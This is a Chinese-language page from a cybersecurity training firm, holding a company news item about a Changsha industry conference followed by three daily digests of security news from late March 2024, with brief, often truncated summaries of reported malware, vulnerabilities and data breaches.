fi
蚁景科技受邀出席“长沙市新一代自主安全计算系统产业链推进大会”
3月29日,由长沙市委网信办主办的“党建聚链·e企赋能”长沙市新一代自主安全计算系统产业链推进大会在世界计算·长沙智谷成功举办。长沙市委常委、市委组织部领导出席活动并讲话。
蚁景科技受邀出席本次大会,与来自产业链上的150余家重点科创企业、科研院所齐聚智谷,共话新方向,共谋新发展。
长沙市网络空间安全和信息化协会换届选举大会也于同期举行,大会通报了长沙市网络空间安全和信息化协会筹备工作情况。全体会员表决通过《协会章程》和《选举规程》,选举产生了理事会、监事会名单,国防科技大学教授姜新文当选为协会理事会理事长。蚁景科技作为协会会员单位参与了大会各项议程的表决和选举。
大会上,长沙市网络空间安全和信息化协会解读了长沙市网络安全工匠人才考试及评定相关政策,并发布了长沙市网络安全人才实训基地试点单位名单。蚁景科技凭借在网络安全领域人才实战技能培养的深耕积累,荣誉入选“长沙市网络安全人才实训基地”首批试点单位。
蚁景科技将立足长沙辐射全国,专注于网络安全人才实战技能培养,通过网安实验室在线靶场平台的建设及网络培训产品研发为高校、企事业单位、科研院所等行业客户提供网络安全“技能教学+靶场实战”服务,实现网安人才技能学习积累、综合技能运用以及考核评估三大目标。持续为实施国家安全战略,促进网络安全技术、人才、产业融合,优化人才培养、技术创新、产业发展的良性生态,推动网络安全能力全面提升贡献力量。
网络安全日报 2024年04月01日
1、DinodasRAT Linux植入程序针对全球实体发起攻击
https://securelist.com/dinodasrat-linux-implant/112284/ 研究人员的报告揭示了DinodasRAT(也称为XDealer)的Linux版本,这是一个用C++编写的多平台后门,主要针对基于Red Hat和Ubuntu Linux的系统。该后门通过创建隐藏文件确保仅运行一个实例,并利用SystemV或SystemD启动脚本来建立持久性。它收集有关受感染机器的信息来创建唯一标识符,而不会收集任何特定于用户的数据。后门通过与C2服务器的TCP或UDP通信来执行各种命令,如文件操作、服务控制、进程枚举和远程shell执行。Linux版本的Dinod
2、PyPI暂停新项目和用户注册以应对恶意软件攻击
https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/ 2024年3月28日,Python Package Index (PyPI)宣布暂停新用户注册和项目创建,以应对Checkmarx安全团队发现的一系列恶意软件包。这些恶意软件包利用“误植”漏洞,通过仿冒域名诱骗用户安装,进而窃取加密货币钱包、浏览器数据和登录凭据。PyPI的这一举措旨在保护Python开发者社区,同时为平台提供时间实施更强大的安全措施。恶意代码位于每个包的setup.py文件中,可在
3、Facebook被指控拦截Snapchat用户流量涉嫌反竞争行为
https://images.law.com/contrib/content/uploads/documents/403/56855/Facebook-antitrust-class-action-complaint.pdf 近日的报道揭露了Facebook在2016年至2019年间通过一个名为“应用内操作面板”(IAAP)的秘密项目,利用名为“捉鬼敢死队”的技术拦截和解密Snapchat、YouTube和Amazon的SSL加密流量。这个项目的目的是为了获取竞争对手的数据,以支持Facebook的竞争决策。Facebook鼓励用户安装套件,这些套件冒充官方服务器并解密流量,使Faceboo
4、XZ实用程序中发现后门漏洞,可破坏sshd身份验证
https://www.openwall.com/lists/oss-security/2024/03/29/4 红帽公司最近发出警告,指出大多数Linux发行版中包含的XZ格式压缩实用程序XZ Utils存在一个严重漏洞(CVE-2024-3094)。这个漏洞可能允许恶意行为者破坏sshd身份验证,并远程获得对整个系统的未经授权的访问。这个漏洞是由于xz库的5.6.0和5.6.1版本中存在恶意代码,这是由PostgreSQL开发人员Andres Freund在微软发现的。红帽表示,这些版本的库中的恶意注入已被混淆,并且仅完整包含在下载包中。此外,红帽还指出,这些易受攻击的版本尚未被Linu
5、新的Linux漏洞可能导致密码泄露和剪贴板劫持
https://pwning.tech/nftables/ 研究人员发现了一个影响util-linux软件包中的“wall”命令的漏洞,编号为CVE-2024-28085,代号为WallEscape。这个漏洞可能导致用户密码泄露或剪贴板内容被更改。在满足特定条件(如mesg设置为“y”和wall设置为setgid)的情况下,攻击者可以利用未正确过滤的转义序列在用户的终端上创建虚假的sudo提示符,诱骗用户输入密码。Ubuntu 22.04和Debian Bookworm易受此攻击,而CentOS由于wall命令没有setgid权限而不易受攻击。建议用户更新到util-linux版本2.40以
6、新的ZenHammer攻击可绕过AMD CPU的RowHammer防御
https://comsec.ethz.ch/research/dram/zenhammer/ 苏黎世联邦理工学院的网络安全研究人员开发了名为ZenHammer的新型DRAM(动态随机存取存储器)攻击变体,这种攻击可以绕过AMD Zen 2和Zen 3系统上的目标行刷新(TRR)等缓解措施。该攻击首次在DDR5设备上触发RowHammer位翻转,尽管制造商已经采取了针对该问题的缓解措施。研究人员表示,AMD系统与Intel系统一样容易受到Rowhammer攻击,这增加了攻击面。研究人员还提供了最佳的锤击指令序列,以提高行激活率,从而促进更有效的锤击。AMD表示正在评估DDR5设备上的RowH
7、AT&T确认7300万客户数据泄露
https://www.att.com/support/article/my-account/000101995?bypasscache=1 AT&T确认了一起影响约7300万现有和前任客户的数据泄露事件。尽管公司之前否认了数据泄露,但最终确认泄露的数据集似乎来自2019年或更早,影响了大约760万当前账户持有者和大约6540万前账户持有者。泄露的数据包括姓名、地址、电话号码,部分客户的社会安全号码和出生日期也被泄露。这些数据最初在2021年由一个名为Shiny Hunters的威胁者声称出售。现在,另一个威胁行为者在黑客论坛上泄露了相同的数据集。AT&T表示,760万客户的安全密码也被泄露
8、动视建议启用2FA保护受恶意软件窃取影响的账户
https://www.bleepingcomputer.com/news/security/activision-enable-2fa-to-secure-accounts-recently-stolen-by-malware/ 动视暴雪建议用户启用双因素身份验证(2FA)来保护其账户,此前有报告称大量游戏玩家的账户信息在恶意软件活动中被窃取。这些账户信息主要涉及使用作弊或付费作弊服务的玩家。数据库中包含数百万游戏玩家的凭据,尤其是《使命召唤》和《反恐精英》玩家。虽然动视暴雪的服务器未受损害,但为了防止潜在的风险,公司推荐用户更改密码并启用2FA。此外,动视暴雪正在与作弊软件开发者协调,以
9、新的Darcula网络钓鱼服务通过iMessage针对iPhone用户
https://www.bleepingcomputer.com/news/security/new-darcula-phishing-service-targets-iphone-users-via-imessage/ Darcula 已被用于各种服务和组织,从邮政、金融、政府、税务部门到电信公司、航空公司、公用事业,为欺诈者提供 200 多种模板供您选择
10、JetBrains 修补了 TeamCity 中的 26 个安全问题
https://www.securityweek.com/26-security-issues-patched-in-teamcity/ JetBrains 已修复其 TeamCity 构建管理和持续集成服务器中的 26 个安全问题,并已采取措施降低漏洞被恶意攻击的风险。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年03月29日
1、近期出现针对Apple设备用户的新型MFA网络钓鱼攻击
https://krebsonsecurity.com/2024/03/recent-mfa-bombing-attacks-targeting-apple-users/ 近期,Apple设备用户成为了一种新型网络钓鱼攻击的靶标,该攻击利用了多重身份验证(MFA)机制。攻击者通过Apple的密码重置工具向受害者发送大量通知,诱使他们重置Apple ID密码。受害者点击“允许”后,攻击者便可接近重置其凭据。即使受害者选择“不允许”,攻击者仍可能通过伪装成苹果支持团队致电受害者,试图获取密码重置代码。此类攻击不仅限于特定类型的Apple设备,而且目前没有简单的防范方法。一些受害者尝试联系Appl
2、黑客开发恶意大型语言模型以绕过现有安全限制
https://www.recordedfuture.com/adversarial-intelligence-red-teaming-malicious-use-cases-ai 在发现现有工具如WormGPT等无法满足其高级入侵功能的需求后,网络骗子正在寻求开发自定义的恶意大型语言模型(LLM)。安全研究人员指出,地下论坛上充满了黑客讨论如何利用OpenAI和谷歌旗下Gemini开发的人工智能聊天机器人设置的护栏。例如,一位名为Poena的俄语威胁行为者在Telegram上发布了招聘人工智能和机器学习专家的广告,以开发恶意的LLM产品。此外,勒索软件和其他恶意软件运营商也显示出对这一趋势
3、Microsoft Edge安全漏洞可能允许静默安装恶意扩展
https://labs.guard.io/cve-2024-21388-microsoft-edges-marketing-api-exploited-for-covert-extension-installation-879fe5ad35ca 研究人员发现了一个Microsoft Edge浏览器中的安全漏洞(CVE-2024-21388),该漏洞可能允许攻击者在用户不知情的情况下秘密安装具有广泛权限的浏览器扩展。这个权限升级缺陷涉及利用浏览器对某些私有API的特权访问,特别是edgeMarketingPagePrivate API,它可以从属于Microsoft的特定白名单网站访问。攻击
4、INC勒索软件团伙攻击苏格兰NHS并窃取3TB数据
https://securityaffairs.com/161143/data-breach/inc-ransom-hacked-national-health-service-of-scotland.html INC勒索软件组织对苏格兰国家医疗服务体系(NHS)发起了网络攻击,并声称窃取了3TB的数据。该组织在其Tor泄露网站上发布了苏格兰NHS的受害者名单,并威胁要公开这些数据。此次攻击发生于2023年3月15日,影响了NHS邓弗里斯和加洛韦,导致至少有“有限数量”的患者数据被黑客获取。苏格兰NHS已确认将与苏格兰警察局、国家网络安全中心、苏格兰政府和其他机构合作,以应对这一事件。INC
5、Facebook被指控曾利用用户设备监视竞品软件
https://www.freebuf.com/news/396187.html 近来,Facebook母公司Meta陷入了一起法律诉讼。据 TechCrunch 报道,Meta 被指控在其数据收集活动上撒谎,并利用其从用户那里“欺骗性地提取”数据进行不公平的斗争。诉讼称,Meta在2016 年 6 月至 2019 年 5 月之间曾使用一种名为“SSL man-in-the-middle”的网络攻击方法来拦截和解密竞品软件 Snapchat、YouTube 和 Amazon 加密的分析流量。
6、印度国防部被黑客打穿,泄露8.8GB数据
https://www.freebuf.com/news/396179.html (3月27日),EclecticIQ 研究人员发布了一份报告称:黑客攻击了印度政府和能源公司,目的是传播一种名为 HackBrowserData 的开源信息窃取恶意软件。该软件能够在某些情况下利用 Slack 作为命令与控制(C2)泄露敏感信息。黑客已经成功入侵了私营能源公司,并获取了财务文件、员工个人资料以及石油和天然气钻探活动的详细信息,攻击行动导致约 8.81 GB 的数据被泄露。
7、数千家使用 Ray 框架的公司面临网络攻击威胁
https://therecord.media/thousands-exposed-to-ray-framework-vulnerability 据 Ray 的开发商 Anyscale 称,Uber、亚马逊和 OpenAI 等大型科技公司都在使用该框架。
8、攻击者利用人工智能生成虚假讣告,进行网络钓鱼攻击
https://www.hackread.com/ai-generated-fake-obituary-websites-target-users/ 他们的最终目的可能是窃取个人数据、通过虚假事件的募捐进行诈骗,或将恶意软件植入访问者的设备。
9、14GB Minecraft玩家个人数据在非法论坛上免费发布
https://cybernews.com/news/minecraft-14gb-data-leak/ 据 Cybernews 研究团队称,共享数据库由 700 多份小型文件组成,这些文件似乎是根据之前的多次泄露和入侵事件汇编而成的。
10、违规使用数据训练大模型 谷歌被罚5亿欧元
http://www.anquan419.com/knews/24/6747.html 由于谷歌公司在未经许可的情况下,使用法国新闻机构和出版商提供的内容训练其旗下人工智能服务Bard的基础模型,违反了欧盟版权法相关规定。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年03月28日
1、针对Ray人工智能框架的新ShadowRay攻击行动
https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild 近日,研究人员披露了一起名为"ShadowRay"的全球性网络攻击活动,这是首次有记录的针对广泛应用的开源人工智能框架Ray的活动性攻击。关键安全漏洞CVE-2023-48022自七个月前以来一直未被修补,该漏洞使得数千家公司的人工智能基础设施面临被恶意利用的风险,攻击者不仅能劫持计算资源进行加密货币挖矿,还有可能泄露敏感数据。受影响的行业包括教育、金融和医疗保健,Uber、亚马逊和Netflix等大公司也使
2、TheMoon变种植入4万多台设备助力匿名代理服务
https://blog.lumen.com/the-darkside-of-themoon/ 据研究人员报道,TheMoon恶意软件的一种新变体近期在全球范围内感染了数万台过时的小型办公和家庭路由器以及物联网(IoT)设备。其目标为已到使用寿命的家用/小型办公室(SOHO)路由器和IoT设备,1月和2月期间,有超过40000台过期设备在88个国家受到感染。TheMoon僵尸网络自2014年首次被发现活动,其运营者自2017年起至少在该恶意软件代码中加入了6种IoT设备的漏洞利用代码。该网络瞄准的是来自多家供应商的宽带调制解调器或路由器,包括Linksys、ASUS、MikroTik、D-L
3、最新报告表明API调用安全风险增加
https://thehackernews.com/2024/03/apis-drive-majority-of-internet-traffic.html 根据Imperva的《2024年API安全状况报告》,在2023年,互联网流量中高达71%源自应用程序编程接口(API)调用。企业网站在2023年平均经历了约15亿次API调用。随着数字服务向客户更快更高效的提供压力不断增加,尽管采用了shift-left框架和软件开发生命周期(SDLC)流程,API仍然在未编目、未认证或未审核的情况下上线。平均而言,组织在生产中有613个API端点,并且这一数字在迅速增长,时间推移这些API可能变成高
4、恶意NuGet软件包曝光针对开发人员
https://www.reversinglabs.com/blog/suspicious-nuget-package-grabs-data-from-industrial-systems 研究人员最近发现NuGet包管理器中出现了一个可疑软件包SqzrFramework480,这个软件包很可能是为了瞄准使用精密工业和数字设备制造商工具的开发者而设计。研究人员指出,该软件包自2024年1月24日首次发布以来,已被下载2999次。该安全公司表示目前没有发现其他具有相似行为的软件包。这一行动被推测很可能用于对装备了摄像头、机器视觉和机械臂的系统进行工业间谍活动。SqzrFramework480软
5、新型网络钓鱼攻击伪装银行通知传播键盘记录器
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/agent-teslas-new-ride-the-rise-of-a-novel-loader/ 研究人员发现了一场新型网络钓鱼攻击,威胁者通过伪装成银行支付通知的电子邮件,诱导用户打开附加的压缩文件。该压缩文件隐藏了一个恶意加载程序,用于在受害主机上部署一个称为Agent Tesla的信息窃取器和键盘记录器。这一加载程序运用了混淆技术来逃避检测,并利用复杂的解密方法和多态行为。它能够绕过杀毒软件防御,通过代理服务器和特定的URLs以及用户代理来检索其有效载荷,以
6、NVIDIA 修补了 Windows 版 ChatRTX 中高危漏洞
https://www.securityweek.com/code-execution-flaws-haunt-nvidia-chatrtx-for-windows/ 人工智能计算巨头 NVIDIA 周三针对其 ChatRTX for Windows 应用程序中的两个软件缺陷推出了紧急补丁,同时警告用户面临代码执行和数据篡改攻击的风险。
7、Chrome 更新修复了Pwn2Own所利用的零日漏洞
https://www.securityweek.com/chrome-update-patches-zero-day-vulnerabilities-exploited-at-pwn2own/ 谷歌周二发布了 Chrome 浏览器安全更新,以解决七个漏洞,其中四个是外部研究人员报告的。
8、Google Play上的免费VPN应用将设备变成代理
https://www.securityweek.com/vpn-apps-on-google-play-turn-android-devices-into-proxies/ 据 Human Security 报道,数十个将 Android 设备转变为住宅代理的 VPN 应用程序已进入 Google Play 商店。所有已识别的恶意应用程序都包含一个 Golang 库,负责将设备注册为代理节点,并且似乎链接到住宅代理卖家 Asocks。
9、空客通过收购 INFODAS 增强网络安全产品
https://fintech.global/2024/03/27/airbus-enhances-cybersecurity-offerings-with-infodas-acquisition/ 此次收购有望显着增强空客的网络安全产品组合,这是其战略愿景的重要组成部分,旨在增强欧洲和全球客户的数字保护。
10、CISA警告:黑客积极攻击微软SharePoint漏洞
https://thehackernews.com/2024/03/cisa-warns-hackers-actively-attacking.html 美国网络安全和基础设施安全局 (CISA)根据野外活跃利用的证据,已将影响 Microsoft Sharepoint Server 的安全漏洞添加到其已知被利用的漏洞 ( KEV )目录中。该漏洞编号为 CVE-2023-24955(CVSS 评分:7.2),是一个严重的远程代码执行缺陷,允许具有站点所有者权限的经过身份验证的攻击者执行任意代码。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

